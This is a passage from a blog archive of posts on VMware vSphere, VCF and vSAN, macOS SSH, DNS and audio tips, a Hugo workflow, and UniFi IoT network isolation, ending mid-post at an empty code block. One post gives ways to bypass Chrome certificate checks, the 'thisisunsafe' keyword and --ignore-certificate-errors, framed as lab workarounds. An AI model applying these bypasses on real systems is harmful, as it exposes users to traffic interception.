(L2TP is based on PPP) connection is made, thus making it easy to trigger a route command when a connection is established. My /etc/ppp/ip-up looks like this: #!/bin/sh /sbin/route add -net <my home network subnet>/24 -interface $1 Replace <my home network subnet>/24 with your network information, and you should be ready to go. Note: This doesn’t differentiate between several L2TP VPN connections, and the script runs regardless of which connection you use. 
I am sure there are ways of doing different routes based on which connection is triggered, but I haven’t had a need to do that so far. Running netstat -rn after making a connection should now show a line similar to the one below, where xxx.xxx.xxx is your remote subnet, routed over a ppp interface: ~ netstat -rn Routing tables Internet: Destination Gateway Flags Netif Expire ... xxx.xxx.xxx ppp0 USc ppp0 ... --- # VMware Updates Minimum Requirements for vSphere 7 With Kubernetes in VCF URL: https://vNinja.net/2020/05/25/vmware-vsphere7-with-kubernetes-vcf-update/ Date: 2020-05-25 Author: christian Tags: vSphere, Cloud Foundation, VMware, Kubernetes, Tanzu VMware has updated the requirements for running Kubernetes workloads on VMware Cloud Foundation, and I’m happy to see that the requirements have been scaled down quite a bit. The news is that it is now supported to enable the Kubernetes Supervisor Control Plane on the Management Workload Domain, letting go of the hard requirement of running it in a separate Workload Domain; instead it runs in a Resource Pool. This is called a consolidated architecture in VMware Cloud Foundation, and it means that the minimum host requirement has been scaled down from 7 hosts to a minimum of 4 hosts. As the Management Workload Domain’s principal storage requirement is vSAN, the requirement is a minimum of 4 nodes. Other requirements are still the same, but this should make it much easier to set up a Proof-of-Concept or lab environment. It’s even supported for production, albeit for small environments. For more details, see the Enabling vSphere with Kubernetes whitepaper. This answers some of the criticism I’ve voiced around vSphere 7 With Kubernetes, and it’s a welcome step in the right direction. Update 26th May 2020 # Cormac Hogan has published a detailed walkthrough on how to set it up in vSphere with Kubernetes on VCF 4.0 Consolidated Architecture. 
--- # VMware vSphere 7 With Kubernetes and Tanzu Resources URL: https://vNinja.net/2020/05/12/vmware-with-kubernetes-and-tanzu/ Date: 2020-05-12 Author: christian Tags: vSphere, Cloud Foundation, VMware, Kubernetes, Tanzu The dust has settled a bit after the big VMware vSphere 7 release, and vSphere 7 with Kubernetes, and there are now some really good resources available for those looking into the details about the various Kubernetes and Tanzu parts of it. Photo by Ben White on Unsplash Here’s a list of fresh content that I’ve found either educational or just simply enlightening on this topic: Cormac Hogan recently published Understanding the Tanzu portfolio (and the new names for VMware modern app products) which is a must read for anyone who is looking for clarification on what the different components that make up the Tanzu portfolio are — and to be honest, most of us probably do need a 101 lesson here. vSphere 7 with Kubernetes – 2 Node Lab Deployment by Viktor van den Berg shows how you can get away with running two ESXi hosts for a vSphere 7 with Kubernetes lab. Pretty awesome, and should make for a great lab exercise. William Lam has even got a post up on doing it with one host (!!), as shown in Deploying a minimal vSphere with Kubernetes environment. The team behind VMware Cloud Foundation Lab Constructor (VLC) has made VLC 4.0 Public beta available: Today I am happy to announce that the VLC 4.0 Public beta (VCF Lab Constructor) is now available. This powerful tool can build an entire nested VCF 4 Lab. To learn more about VLC see the blog below. VLC 4 beta is available to registered users in VLC Slack. https://t.co/OIhiAMLZKs — SDDC Commander (@SDDCCommander) May 8, 2020 I’ve used VLC to run live Cloud Foundation demos in various settings before, and it works really well. Check out the Using Tanzu Kubernetes Grid to Deploy Kubernetes with Ease webinar by Kenny Coleman. Last, but not least, William Lam is at it again — and it’s awesome, as usual. 
This time he’s made a Demo Appliance for Tanzu Kubernetes Grid (TKG) Fling available. With this you don’t need anything but this appliance to be able to play around with TKG! Running vSphere 7 with Kubernetes in the lab is definitely on my TODO list! By the way, you can find all of William’s vSphere with K8s and TKG articles easily as well. --- # The Problem with VMware vSphere 7 With Kubernetes URL: https://vNinja.net/2020/03/10/vmware-vsphere7-with-kubernetes/ Date: 2020-03-10 Author: christian Tags: vSphere, Cloud Foundation, VMware, Kubernetes All in all, Cloud Foundation 4.0 seems to be a solid version upgrade, with a lot of promise. The tight integration between Cloud Foundation and vSphere with Kubernetes, coupled with the other management tools already available from VMware, should prove to be a solid foundation (pun intended) for anyone looking to provide both traditional virtualization and container workloads in their on-premises datacenters going forward. The problem with this, in my not so humble opinion, is that vSphere with Kubernetes is (for now?) only available through Cloud Foundation 4.0. That is a very limiting form factor for delivery, and something that might just slow the adoption rate for it considerably. To launch this series, we’ll put a spotlight on the Tanzu Kubernetes Grid integration with vSphere 7, newly re-architected with Kubernetes to run both modern container-based and traditional virtual machine-based workloads and delivered exclusively on VCF 4. … By establishing vSphere 7 as a platform that consolidates containers and VMs into a single stack with the development tools and Kubernetes runtime, developers and operators can now collaborate. ref: https://blogs.vmware.com/cloud-foundation/2020/03/10/delivering-kubernetes-at-cloud-scale-with-vmware-cloud-foundation-4/ and The following breakthrough capabilities are available for customers using containers and Kubernetes. 
Note that the Kubernetes capabilities of vSphere 7 are available only as part of VMware Cloud Foundation 4 with Tanzu. ref: https://blogs.vmware.com/vsphere/2020/03/vsphere-7.html Turns out, you cannot simply set up Kubernetes workloads in a standalone vSphere 7 cluster. While I do understand some of the reasoning behind this, like the dependency on NSX-T to do this properly, it’s also a major stumbling block for potential customers. Updated: A previous version of this post claimed that vSAN was also a requirement for Kubernetes WDs, and that is not the case. Kubernetes WDs can run on other storage solutions supported by VCF, and do not require vSAN. Today’s announcement begs the question: is vSphere 7 the platform that consolidates containers and VMs, or is that platform in reality Cloud Foundation 4.0? In order to get vSphere with Kubernetes up and running, a minimum of seven hosts is required: four for the Management Workload Domain, and a minimum of three hosts for the Kubernetes WD. That’s a tall order that comes with a hefty price tag if someone wants to dip their toes in the sea of containers. Of course, customers can still look at PKS as an alternative with a smaller footprint, or even things like NetApp Kubernetes Service, but in my opinion it would be better if existing “standalone” vSphere estates could take on these workloads, without the requirement for a full Cloud Foundation stack powering it. Something like running small Kubernetes-based workloads in a resource pool in vSphere would be very useful, even if it won’t scale indefinitely or even to a production-ready state. It’s not like the bits to do this aren’t already there, as vSphere 7 and vCenter 7 support it in the VCF construct. If VMware really wants to own this space, and bring containers into the administrative fold of the vSphere Admins (VI Admins), the absolute requirement for Cloud Foundation needs to be relaxed — even if it’s just in a downscaled, non-production-ready scenario. 
To get the admins aboard, they need to be able to play. Very few will have the resources to play with this if the requirements stay as they are. Hopefully this is something that will get addressed down the road, as not everyone, even though I would like them to be, is a potential Cloud Foundation customer. Update 12. March 2020 # I have received a lot of feedback, both public and private, on this post, and many agree that the initial hurdle to get this up and running is indeed steep. That being said, there are alternatives available — also from VMware. VMware Tanzu Kubernetes Grid can be run in your existing VMware vSphere estate, and this does eliminate the Cloud Foundation requirement to get started. VMware Tanzu Kubernetes Grid can run on vSphere 6.7 and newer, as well as VMware Cloud on AWS and others, and might just be the best way forward for non-greenfield deployments. For vSphere 6.5, PKS is the way to go, and there is a transition path from PKS to TKG available as well. Also note that it seems like the Cloud Foundation requirements might just be relaxed in future releases, and that the deployment method for enabling vSphere with Kubernetes might change down the road. For now, it is what it is, but as always — things are going to change. Time to get the lab fired up! Update 02. April 2020 # Kit Colbert has published How to Get vSphere with Kubernetes which highlights the reasoning behind this: Given that multiple components were now needed (ESXi, vCenter, NSX), orchestration was necessary to coordinate lifecycle and health management. SDDC Manager was the perfect fit. As it turns out, vSphere + NSX + SDDC Manager = VMware Cloud Foundation (VCF). And we’ve made the integration with Kubernetes work seamlessly with our recently announced VCF 4. So there it is. For now, if you want vSphere with Kubernetes, VCF is the way to go. 
--- # VMware Cloud Foundation 4.0 Announced URL: https://vNinja.net/2020/03/10/vmware-cloud-foundation-40-announced/ Date: 2020-03-10 Author: christian Tags: vSphere, Cloud Foundation, VMware During today’s Online Launch Event, App Modernization in a Multi-Cloud World, VMware announced the next generation of VMware Cloud Foundation: version 4.0. This release includes support for the new versions of vSphere and vSAN, as well as updates to the vRealize Suite and NSX. NSX is not released in a new version at this time, but this Cloud Foundation update moves its requirement from NSX-V to NSX-T. Here are a few of the highlights that the new release brings to market: vSphere with Kubernetes on VMware Cloud Foundation Now this is the big one! Cloud Foundation can now serve as the private cloud infrastructure for both traditional VMs and container-based workloads. Simply put, VM admins get to use the tools they are used to, like vCenter, to manage resources, and developers get access to known APIs for provisioning. This “best of both worlds” approach provides automated deployment of containerized Compute, Storage, and Network resources, without requiring specialized knowledge of containers. Just like everything else in the Cloud Foundation world, the Kubernetes integration works within the Workload Domain nomenclature. Spin up a Kubernetes Workload Domain in Cloud Foundation through the SDDC Manager, and your datacenter is ready to onboard containers. This also allows for Lifecycle Management of the entire software stack, vSphere to K8s runtime, from a single interface. Reduced Management Domain Footprint The Management Domain (WD) footprint has been reduced, since the vCenter PSCs are now embedded and the NSX Managers and Controllers are integrated. 
Lifecycle Management - Ease of Upgrades and Patching Lifecycle Management has been significantly simplified Multi-Instance Management Through a new Federation feature, SDDC Manager now supports viewing and managing multiple Cloud Foundation instances. This includes viewing patching, upgrades, maintenance and remediation operations. --- # VMware vSAN 7 Announced URL: https://vNinja.net/2020/03/10/vmware-vsan7-announced/ Date: 2020-03-10 Author: christian Tags: vSphere, vSAN, VMware With vSphere 7 comes vSAN 7, and it comes with a good set of new features and improvements. Here is a quick rundown of the highlights. Simpler and More Complete Lifecycle Management at Scale # vSphere Lifecycle Manager (vLCM) – Unified software and firmware management # Uses desired-state model for all lifecycle operations Monitors compliance “drift” Remediates back to desired state Built to manage server stack in cluster Hypervisor Drivers Firmware Modular framework supports vendor firmware plugins Dell HPE Integrated File Services Managed through vCenter # Native file services for vSAN # vSAN 7 offers file services, provided through NFS v4.1 & v3 Quota support Continued Integration of Cloud Native Storage in vSphere and vSAN # File-based persistent volumes on vSAN Supports vVols Enables persistent volume encryption and snapshots Supports volume resizing Supports a mix of tooling Wavefront Prometheus vRealize Operations Improved VM Placement Intelligence with Stretched Clusters # Integrated DRS awareness of Stretched Cluster configurations # Prioritizes I/O read locality over any VM site affinity rules Instructs DRS not to migrate VMs to desired site until resyncs complete Reduces I/O across ISL in recovery conditions Improves VM read performance Frees up ISL for resyncs to regain compliance Improved Resilience with Stretched Cluster and 2-Node Topologies # “Replace Witness” workflow will now invoke an immediate repair to regain compliance Applies to stretched cluster and 2-node topologies 
Minimizes interruption with site-level protection Intelligent Capacity Management for Stretched Cluster Topologies # Prevents capacity imbalance from impacting VM uptime in stretched clusters Redirects active I/O to the site with available capacity Allows for VMs to continue non-disruptively in capacity-strained conditions Assumes rebalancing within site has taken place Unified Cloud Analytics for your VMware Powered Environments # VMware Skyline integration with vSphere Health and vSAN Health # Skyline Health — All Customers Skyline Advisor — Production & Premier Customers Skyline Advisor — Premier Customers Improved Consistency in VM Capacity Reporting # Consistent VM-level capacity usage across vCenter UI and APIs # Accurately accounts for used capacity of: Thin provisioned VMs SwapObject NamespaceObject Reduces confusion on capacity consumed by a VM Easily View Memory Consumption for vSAN services # New vSAN memory metric in the vSAN performance service # vSAN memory metric available in API and UI Time-based memory consumption details per host View consumption as a result of hardware and software configuration changes Adding devices or disk groups Enabling/disabling data services Improved Awareness of vSphere Replication Data # Visibility of vSphere Replication objects in vSAN capacity views # Easily identify objects created by and used with vSphere Replication New vSphere Replication object identity type in “Virtual Objects” listing New vSphere Replication categories for cluster-level capacity view Increase Efficiency with the Latest Hardware # Support for larger capacity devices # 32 TB physical capacity 1 PB in logical capacity (DD&C) Potential for improved deduplication ratios with larger devices Designed to minimize data movement for support of new devices Flexible Serviceability for NVMe Devices Improves Uptime # Native support for planned and unplanned maintenance with NVMe hot plug # Hot plug support for both vSphere and vSAN Better TCO through RASM 
Reliability Availability Serviceability Manageability Minimizes host restarts Reduces complexity of steps to service systems Select OEM platforms only Improved Flexibility for Applications using Shared Disks on vSAN # Removal of Eager Zero Thick (EZT) requirement for shared disks in vSAN # Eager Zero Thick (EZT) requirement eliminated for Oracle RAC on vSAN Applies to all shared virtual disks using multi-writer flag (MWF) Object Space Reservation (OSR) storage policy rule set to 100 is no longer necessary for shared disks Closing Comments # All in all, great improvements in this vSAN release. File services with NFS is interesting, as well as the integrated DRS awareness of Stretched Cluster configurations. Better visibility for vSAN memory resource utilization is also very welcome! Improved Lifecycle Management is also something that I’ve been looking forward to, and should make day 2 operations of a vSAN environment even better than it has been. --- # macOS Keeps Asking for SSH Passphrase URL: https://vNinja.net/2020/03/05/macos-asking-for-ssh-passphrase/ Date: 2020-03-05 Author: christian Tags: macOS, SSH I’m a big fan of Public Key authentication for SSH, but I recently ran into an issue after adding my Public Key to a couple of new Linux VMs I use. The problem was that macOS kept asking for the SSH passphrase when connecting to them, which kind of defeats the purpose of using Public Key authentication in the first place. Thankfully, the solution is pretty simple. In ~/.ssh/config, add the following to the end of the file, to allow usage of the Apple Keychain for SSH: Host * UseKeychain yes This simply allows the usage of the SSH key passphrase stored in the Keychain for all hosts. Note: You can specify this setting for specific hosts too if you want to, by replacing the asterisk with the hostname and/or IP address for the host. Apparently this was a change done in macOS Sierra, and I don’t know why I haven’t come across it before now! 
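The Host * stanza above can be appended in one go; a minimal sketch, which also adds AddKeysToAgent — an extra OpenSSH option (my assumption, not from the original post) that loads the key into ssh-agent on first use so you are not asked again in the same session:

```shell
# Append the Keychain settings to ~/.ssh/config.
# "UseKeychain" is the Apple-specific option from the post;
# "AddKeysToAgent" is an additional, standard OpenSSH option.
cfg="$HOME/.ssh/config"
mkdir -p "$HOME/.ssh"
cat >> "$cfg" <<'EOF'
Host *
  UseKeychain yes
  AddKeysToAgent yes
EOF
```

On macOS you can also pre-load the passphrase into the Keychain once with ssh-add -K ~/.ssh/id_rsa, assuming that is the key you use.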
--- # Norwegian vExperts 2020 URL: https://vNinja.net/2020/02/24/norwegian-vexperts-2020/ Date: 2020-02-24 Author: christian Tags: vExpert, VMware VMware has just announced the list of vExperts for 2020, and I’m honored to be awarded for the tenth year in a row! That being said, I’m happy to see the list of Norwegian vExperts grow! It wasn’t that many years ago that we were only two (or for the first couple of years, only one!), now the count is at 12! You can check the entire official vExpert Directory here, but here is a list of the Norwegian vExpert Class of 2020: Name Twitter Blog Morten Werner Forsbring @forsbring n/a Frode Garnes @frode_garnes n/a Bengt Grønås @bgronas blog.bengt.no Rudi Martinsen @RudiMartinsen rudimartinsen.com Christian Mohn @h0bbel vNinja.net Bjørn-Tore Nikolaisen @btn003 n/a Børre Nygren @borrenygren n/a Roger Samdal @rsamdal vfokus.no Marius Sandbu @msandbu msandbu.org Bjørn Sørensen @bjosoren tech.iot-it.no Lars Trøen @larstr core-four.info Andreas Vedå @Andyve vedaa.net That’s quite a list! Out of those 12, I’d like to especially congratulate Frode Garnes, Bjørn Sørensen and Andreas Vedå who all earned their first star this year. Well done! I’ve also created a Twitter list for those on the list above with public Twitter profiles: Norwegian vExperts 2020. --- # rPI+Volumio+HiFiBerry=Awesome URL: https://vNinja.net/2020/02/14/using-rpi-volumio-hifiberry/ Date: 2020-02-14 Author: christian Tags: rPI, HifiBerry, Volumio, Audio, IoT My audio setup is an old NAD 326 BEE stereo amplifier with a couple of Dali Blue 5005 speakers. I also have a turntable connected to it, and it sounds beautiful. Previously I had an Amazon Echo Dot connected to the amp, to provide me with Spotify Connect, but it turned out there were a couple of issues with it. Firstly, the digital-to-analog converter (DAC) in the Echo Dot left a lot to be desired. Secondly, it was cumbersome to use when there is more than one user. 
In order for anyone else in the household to use it, Amazon profiles needed to be configured for each, and we then had to switch profiles for it to be available to a given user. Not very user friendly, and since none of us really enjoy talking to our devices, it was not ideal by any means. The solution for enabling streaming to an old (but awesome) amp was using the Raspberry Pi 3 B+ I had laying around. I added a HiFiBerry DAC+ HAT to it, and enclosed it in a nice little case that also comes from HifiBerry. As far as software goes, it’s installed with Volumio - The Audiophile Music Player. This is a “self-contained” distribution that supports, amongst many others, the HifiBerry DAC. It offers a very simple installation procedure: stick it on an SD card and boot up the rPI. If you are looking for complete installation details, see Re-Use Your Old Raspberry PI as a Music Player. Once it connects to my network, I can just visit http://volumio.local in my browser (when at home) to open it up, and start streaming web radio or play my local music library from my NAS. If I want to stream from Spotify, or even use Apple Airplay, that works too. Volumio just pops up as an available device when I’m on my home network. When it comes to profiles, which was an issue with the old setup, Volumio has none. If no-one is streaming to it, it’s available. If someone else in the house is using it, well, then they “own” it and I can’t take over (unless I connect to the web frontend and stop the streaming). This is much easier than having to switch profiles to enable streaming for a given user. It also comes with a nice web frontend to see what’s going on. Of course, there is also the added benefit of removing a voluntarily installed listening device from my living room, which can’t be a bad thing. 
--- # My Hugo and Visual Studio Code Workflow URL: https://vNinja.net/2020/02/12/my-hugo-workflow/ Date: 2020-02-12 Author: christian Tags: Hugo, Visual Studio Code, Workflow Since moving this site over to Hugo back in 2018, I’ve developed a workflow that seems to work pretty well. Given that I see that a lot of others are also moving over to static site generators, and I wasn’t exactly ahead of the curve on it myself, I figured I would try to write up how I work with Hugo and Visual Studio Code on my MacBook to generate content. Editor of Choice # As mentioned, I use Visual Studio Code as my editor, with a set of extensions: Hugo Snippets Markdown Preview Github Styling markdownlint Markdown Shortcuts Markdown All in One Better TOML Bootstrap 4, Font awesome 4, Font Awesome 5 Free & Pro snippets Paste Image There is probably some overlap between a couple of these extensions, but it seems to work just fine. Paste Image Config # Out of that list I would like to highlight Paste Image as my absolute favorite. In short, it allows for pasting screenshots directly from the clipboard into a Markdown document. In addition to this, it also takes care of saving the image in the correct place, which saves a lot of manual work. All my images reside in /static/img on my local file system, which Hugo then renders as /img/<filename> in the generated URL. This setup also puts the screenshots in /img/name-of-the-markdown-file/ automatically, which makes everything just a bit easier to manage. 
"pasteImage.path": "${projectRoot}/static/img/${currentFileNameWithoutExt}", "pasteImage.namePrefix": "${currentFileNameWithoutExt}_", "pasteImage.prefix": "/img/", "pasteImage.basePath": "${projectRoot}/static/img" Hugo # config.toml # Within my Hugo config.toml I’ve set code as my preferred editor, like this: # Set content editor newContentEditor = "code" Note, for this to work code needs to be added to your system path" Hugo Shortcodes # In order to speed up writing posts, I have also created a few custom Hugo shortcodes for Bootstrap4. These makes it easy to add things like Bootstrap alerts in my posts. These are then added to Visual Studio Code, via the markdown.json file. The other snippes I use, come from the Hugo Snippets extension. Custom Zsh aliases and functions # I have also added a couple of Hugo and site specific aliases and functions to my .zshrc file: #Hugo Specific local BLOG_PATH=<the path to my Hugo files> alias vninjad="cd '$BLOG_PATH'" function vninjaserv() { cd $BLOG_PATH open "/Applications/Google Chrome.app" http://localhost:1313 hugo server -D -F } function hugonew() { cd $BLOG_PATH && hugo new content/post/$1.md } # Image Optimization alias imgoptim="/Applications/ImageOptim.app/Contents/MacOS/ImageOptim" BLOG_PATH is just a variable that holds the location of the local Hugo files. vninjad, basically just lets me jump into my local file location for this site. vninjaserv jumps to the same directory, opens Chrome for local previews, and starts the local Hugo server. hugonew jumps to the same location as vninjad, but it also runs the Hugo command to create a new post with a name, given in the argument. For example, to create this very post, I ran hugonew my-hugo-workflow. This pops up Visual Studio Code, since that’s the editor I’ve defined in config.toml, with my predefined front matter template for posts. If you want to specify which editor to use, you can add --editor="<your_editor>" to the end of the line. 
imgoptim basically just calls ImageOptim from the command line, and lets me automatically optimize the images in a given directory, which is really useful in combination with the automatic screenshot features that Paste Image provides. All in all, pretty awesome, and it does make it really quick to write something, especially when you can have your terminal window available right in Visual Studio Code! Once I’m happy with something locally, I’ll just commit it to GitHub and let Netlify take care of the rest. --- # macOS: Using Custom DNS Resolvers URL: https://vNinja.net/2020/02/06/macos-custom-dns-resolvers/ Date: 2020-02-06 Author: christian Tags: macOS, DNS Sometimes there is a need to use custom DNS servers for some domains, in my case specifically for access to the new lab environment we are building at work (more on that later, this is one beefy lab!) One way of doing this is adding custom DNS servers to /etc/resolv.conf, but in macOS you really shouldn’t be editing that file manually, as it often gets overwritten or otherwise edited by VPN clients and such. Thankfully, there is a better way to create persistent and manageable custom domain-specific DNS settings. Make a new folder called /etc/resolver/ Inside that folder, create a new file with the name of the domain you want custom DNS settings for, in this case myhugelab.local Edit that file, and add your custom domain, search path and nameservers. My example file looks like this: domain myhugelab.local search myhugelab.local nameserver 10.0.0.53 nameserver 10.0.0.54 Save the file, and run sudo killall -HUP mDNSResponder in your terminal of choice to force a DNS refresh Verify that the new DNS settings are in place by running scutil --dns and looking at the output for the entries added in step 3. resolver #8 domain : myhugelab.local search domain[0] : myhugelab.local nameserver[0] : 10.0.0.53 nameserver[1] : 10.0.0.54 Check that name resolution works! 
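The steps above can be staged as a small script, so the resolver file can be reviewed before it is copied into place; a sketch using the example lab domain and nameservers from the post:

```shell
# Stage the resolver file for the example lab domain.
# "myhugelab.local" and the 10.0.0.x nameservers are the
# example values from the post; adjust for your own lab.
staged="$(mktemp)"
cat > "$staged" <<'EOF'
domain myhugelab.local
search myhugelab.local
nameserver 10.0.0.53
nameserver 10.0.0.54
EOF
# Then, on the actual machine, install it and refresh DNS:
#   sudo mkdir -p /etc/resolver
#   sudo cp "$staged" /etc/resolver/myhugelab.local
#   sudo killall -HUP mDNSResponder
```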
This way I can redirect host name resolution to the lab DNS servers, without having to do anything but connect to that network first. Doing this with /etc/resolver/domainname files is a lot cleaner than other methods, requires less work and is much easier to keep track of. I’d call that a win every day! And remember, it’s always DNS. Unless it’s NTP. --- # macOS: Using and creating Multi-Output Sound Devices URL: https://vNinja.net/2020/02/04/macos-multi-output-devices/ Date: 2020-02-04 Author: christian Tags: macOS I recently got a pair of new displays for the office, a couple of lovely Dell U2719DCs. These offer USB-C connectivity, which is really nice, and makes it easy to connect my MacBook when I’m in the office. Connected to one of the displays is a Logitech Z337 set of speakers with a sub, since there are no built-in speakers in these displays. The problem I had with that setup is that macOS doesn’t let me easily differentiate between the two, as they are named exactly the same, sometimes creating confusion as to which of them should be the sound output to the speakers. Sometimes macOS selects the wrong one when I connect, and I get no sound until I switch to the correct one. As far as I can tell, there is also not an easy way in macOS to rename a display, so it’s hard to know which one is which. Of course, I could potentially connect an audio splitter cable, and connect both displays to the speakers that way, but I figured there had to be a way to do that in software. Luckily, macOS lets you do exactly that natively. macOS Audio Midi Setup, which you can find in the Applications->Utilities folder, is the key here. This little tool lets you, amongst other things, create what’s called a Multi-Output Device, which is what I’m using it for. In short, a Multi-Output Sound Device is just a collection of sound devices, presented as one. By creating one of these, I can make a new sound device that contains both my displays, and use that as my output. 
That way, it does not really matter where the speakers are connected, as long as they are connected to either one of the displays. Configuring a Multi-Output Sound Device in macOS # Start Audio MIDI Setup from Applications->Utilities. This will show the available audio devices. Click on the small + on the bottom left, and select Create Multi-Output Device. Select the outputs you want to include in the output group. By default it will also enable drift correction, but since I really only have one output I deselected that. Rename the Multi-Output Device to something that makes sense to you, by clicking its name. Use the new Multi-Output Device as your output, instead of any of the defaults, and you’re ready to go. That’s it! There are of course other use cases for this, like for instance connecting several headsets to a single Mac, or even several speaker systems. --- # macOS: Catalina Chrome Self-signed Certificate Issues URL: https://vNinja.net/2019/12/03/macos-catalina-chrome-cert-issues/ Date: 2019-12-03 Author: christian Tags: macOS, TLS, Security, Certificates, VMware, vSphere, Chrome Way back in 2017, the CA/Browser Forum voted on Ballot 193 – 825-day Certificate Lifetimes, which passed. In short, this means that CA-issued certificates issued after March 1st 2018 cannot have a validity period longer than 825 days. macOS Catalina implements this change, as described in Requirements for trusted certificates in iOS 13 and macOS 10.15. So it’s been a long time coming, but most of us are just now realizing how this affects us. This also applies to self-signed certificates, like the ones issued for VMware vSphere and related solutions, like NSX-T and others, where the default age is 10 years or so. Chrome on macOS is a bit stricter than Safari and Firefox, and doesn’t display an obvious way of proceeding if the certificate expiry date is more than 825 days from the time it was issued: As shown above, there is no “continue at your own risk” option here.
There are, however, a couple of ways to work around this. Method 1 # Cheat! Chrome has a “hidden” option to bypass certificate issues. Simply type thisisunsafe into the browser window, and it will magically let you continue to the site! Granted, this isn’t a permanent solution in any way, but it might help you out of a pickle. Method 2 # The second method is more permanent than Method 1, but also not advisable unless this is in a lab environment. Import the certificate into your macOS keychain. Open the certificate in Chrome, and simply drag the certificate icon to your desktop (or somewhere else). Find the exported certificate, and double-click on it to import it into your keychain. It should then appear under Category -> Certificates. Reload Chrome, and you should be able to open the site without issues. Method 3 # Start Chrome with flags. Chrome also has a few command line flags, or arguments, and one of them is --ignore-certificate-errors. Guess what that does? I have created an alias on my MacBook that looks like this: alias chrome-cert='open -a "Google Chrome" --args --ignore-certificate-errors' So if I need to turn off certificate error warnings for a period of time, all I have to do is quit Chrome, if it is already running, and start it in terminal with the chrome-cert command. Obviously the best way to permanently fix this is to use proper CA-issued certificates (I guess that’s Method 4, really), but at least there are workarounds that allow the continued use of Chrome to manage your systems if replacing the certificates is not an option. I’m sure VMware, and others, will implement the max age of 825 days going forward, but that is going to take some time. In fairness, the decision not to support >825-day certificates was taken back in 2017, so it should really have been taken care of already.
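To see whether a certificate actually trips the 825-day limit, openssl can show its validity window. A hedged sketch: instead of querying a live host it generates a throwaway 10-year certificate (roughly the old vSphere default), vcenter.example.local is a placeholder CN, and `date -d` is GNU date (on macOS, install coreutils and use gdate).

```shell
# Generate a throwaway self-signed cert with a 10-year lifetime,
# similar to the old vSphere defaults (the CN is a placeholder).
openssl req -x509 -newkey rsa:2048 -nodes -keyout /tmp/demo.key \
  -out /tmp/demo.crt -days 3650 -subj "/CN=vcenter.example.local" 2>/dev/null

# Compute the validity period in days (date -d is GNU date;
# on macOS use gdate from coreutils instead).
start=$(date -d "$(openssl x509 -noout -startdate -in /tmp/demo.crt | cut -d= -f2)" +%s)
end=$(date -d "$(openssl x509 -noout -enddate -in /tmp/demo.crt | cut -d= -f2)" +%s)
days=$(( (end - start) / 86400 ))
echo "validity: $days days"

# For a live server, the same check works against the served cert:
#   echo | openssl s_client -connect vcenter.example.local:443 2>/dev/null \
#     | openssl x509 -noout -startdate -enddate
```

Anything over 825 days, issued after March 1st 2018, is what Catalina (and therefore Chrome) rejects.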
--- # Guide: Creating an Isolated Ubiquiti Unifi IoT Network URL: https://vNinja.net/2019/08/12/unifi-iot-networks/ Date: 2019-08-12 Author: christian Tags: networking, ubiquiti, USG, IoT, UniFi As I’ve covered before, I run my home network mostly on Ubiquiti UniFi hardware. Since this offers a lot of nifty possibilities, I figured I should try to isolate all my “IoT”-devices in a separate network, while still making them accessible. After all, you don’t want a security issue on some sensor/automation thing you have in your house to be able to access and encrypt your family photos, right? The thing that sits in the corner and controls the color of your lightbulbs does not need to have access to the same network as your other data. Right now, my list of devices looks like this: Amazon Echo(s) Google Chromecast and Google Home Mini Philips Hue bridges IKEA Trådfri bridges Verisure Alarm System Most of these are fine to just move into an isolated network, like the setup I’ve outlined previously, but not all of them. The Philips Hue Bridge, IKEA Trådfri Gateway and the Verisure Gateway were all fine with being moved over to the new VLAN. This makes sense, as once they are configured all they do is communicate out to their respective cloud services — and the management apps for them connect to that service, not directly to the device itself. The Amazon Echos and Google Chromecast/Home Mini are a different story though. This also makes sense, since these devices are supposed to receive data from your other devices - directly. My primary use case for them is Spotify Connect so I can stream music to my stereo setups (I have an old analog NAD receiver with some nice Dali speakers that do not have digital connections at all), so being able to actually stream music to them is rather useful.
The following information was correct at the time of posting, based on a setup with 1 x UniFi Security Gateway 3P (4.4.41.5193700), 1 x UniFi Switch 8 POE-60W (4.0.42.10433) and 5 x UniFi AP-AC-Mesh (4.0.42.10433) 1. Creating the Isolated IoT Network # The process of creating, and isolating, a new IoT network is the same procedure as I have outlined before: Creating Isolated Networks with Ubiquiti UniFi. Once you have this network in place, be it either via WiFi or via physical VLAN tagging on a switch port (or both), you can start moving your devices over. The Philips Hue Bridge, IKEA Trådfri Gateway and the Verisure Gateway were simple, since they are physically cabled: just move them over to a configured port on the UniFi Switch. These devices then got a new IP assigned to them from the new network definition, and their management apps still worked without problems. 1.2 Configuring the mDNS reflector # For the Amazon Echos and Google Chromecast/Home Mini there are some other requirements that need to be in place. The first thing is to enable the Multicast DNS (mDNS) reflector. mDNS is the discovery protocol that lets clients on your network find these devices. By default mDNS does not flow between VLANs, so in order to make discovery of these devices possible once they are in a separate VLAN, the UniFi mDNS Reflector needs to be enabled on the controller. Log into your controller, and go to Settings->Services->MDNS and enable it. This enables mDNS requests to traverse the VLANs, and makes discovery across them possible. 1.4 Tweaking firewall rules # The second thing that needs to be done, if it is not already in place, is to tweak the firewall rules between the IoT network and “normal” network. In the setup I’ve outlined previously, all traffic coming from the isolated network is blocked, and in order to be able to reach the Amazon Echos and Google Chromecast/Home devices properly, a new rule needs to be added.
Some traffic needs to be allowed back to the clients in the other VLAN, and the easiest way of doing this is by creating an allow rule for Established and Related TCP/UDP states. In short, this means that connections that are already in place, or related to those established connections, will be allowed. This will still secure your networks, as devices in the IoT VLAN will still not be able to traverse the VLANs independently. Give the rule a name that makes sense, enable it and expand Advanced. Find States and select Established and Related. Expand Sources, click on Network and select the “IoT” network you have created. Then go to Destination, select Network again, and choose the network your regular devices are located in. Click on Save to make the rule active. 1.5 Moving Wireless devices # Now, you can start moving your streaming devices. Both Amazon Echo and Google Home Mini/Chromecast are easy to move to a new Wireless SSID. For the Echo I just used the Alexa app on my phone to move it over to the new network — and the Google Home app did the same for the Google Home Mini and the Chromecast. Screenshots # Screenshots taken while connected to a different SSID than the “IoT” network. 2 Specific Equipment # 2.1 Getting Sonos to work # Updated September 9th 2019: Michael Ryom has come up with a recipe for enabling Sonos Wireless Speakers in a similar setup. In short, you’ll need to enable UPnP and open TCP/3500 in the firewall from the IoT Network to your LAN. Check his tweet for screenshots. Conclusion # Once these steps are completed, streaming of data from your laptop/phone/tablet in the “normal” VLAN to the devices in your “IoT” network should still work as before, with the added security of not having them in the same network segment as the rest of your devices. I can still control my lights, and my alarm system, from my phone/tablet without any problems. I do kind of like this.
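Under the hood the USG runs EdgeOS, so the Established and Related rule described above boils down to an iptables conntrack state match. The sketch below is purely illustrative: the chain name mirrors the LAN IN label in the UI, the subnets are hypothetical examples (IoT on VLAN 42, a main LAN), and you should never hand-edit iptables on a controller-managed USG, since the controller owns and re-provisions these rules.

```shell
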